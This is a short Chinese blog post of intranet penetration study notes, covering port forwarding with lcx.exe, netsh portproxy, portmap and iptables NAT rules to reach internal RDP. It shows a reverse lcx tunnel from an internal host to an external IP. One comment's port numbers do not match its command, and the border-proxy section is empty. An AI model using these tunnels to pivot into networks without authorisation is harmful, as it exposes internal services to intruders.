内网渗透学习记录(二.端口转发和边界代理)

默认分类 2017-11-28

端口转发

windows下

1.lcx.exe

本地外网

lcx.exe -listen 1234 2345
#监听1234转发数据到2345

内网中

lcx.exe -slave 外网ip 1234 127.0.0.1 3389
#然后终端远程连接  127.0.0.1:2345即可

我这里环境搭在一个局域网的,本机监听1234,转发到2345

内网中主机转发到外面(虚拟机环境就是本地查看虚拟机ip即可)

另一台主机终端连接本地物理机ip:192.168.199.239:2345(输入密码,连接成功)

2.windows自带的netsh(支持ipv4和v6,只支持TCP协议)

netsh interface portproxy show all
#显示端口转发代理参数

netsh interface portproxy set v4tov4 listenaddress=192.168.244.6 listenport=3389 connectaddress=192.168.244.5 connectport=3389
#将192.168.244.6的1234端口转发到192.168.244.5的1234端口(可以实现内网之间的相互通信,244.5的远程桌面,直接连6的)

netsh interface portproxy delete v4tov4 listenport=3389
#删除本地端口3389的端口转发配置

linux下

1.portmap

./portmap -m 2 -p1 1234 -p2 2345
#监听1234转发数据到2345

./portmap -m 1 -p1 3389 -h2 -p2 1234
#将内网3389转发到本地1234端口

2.iptables

需要访问的内网地址:192.168.244.100
内网边界web服务器:192.168.244.7
iptables -t nat -A PREROUTING --dst 192.168.244.7 -p tcp --dport 3389 -j DNAT --to-destination 192.168.244.100:3389

iptables -t nat -A POSTROUTING --dst 192.168.244.100 -p tcp --dport 3389 -j SNAT --to-source 192.168.244.7

边界代理


本文由 sp4rk 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

还不快抢沙发

添加新评论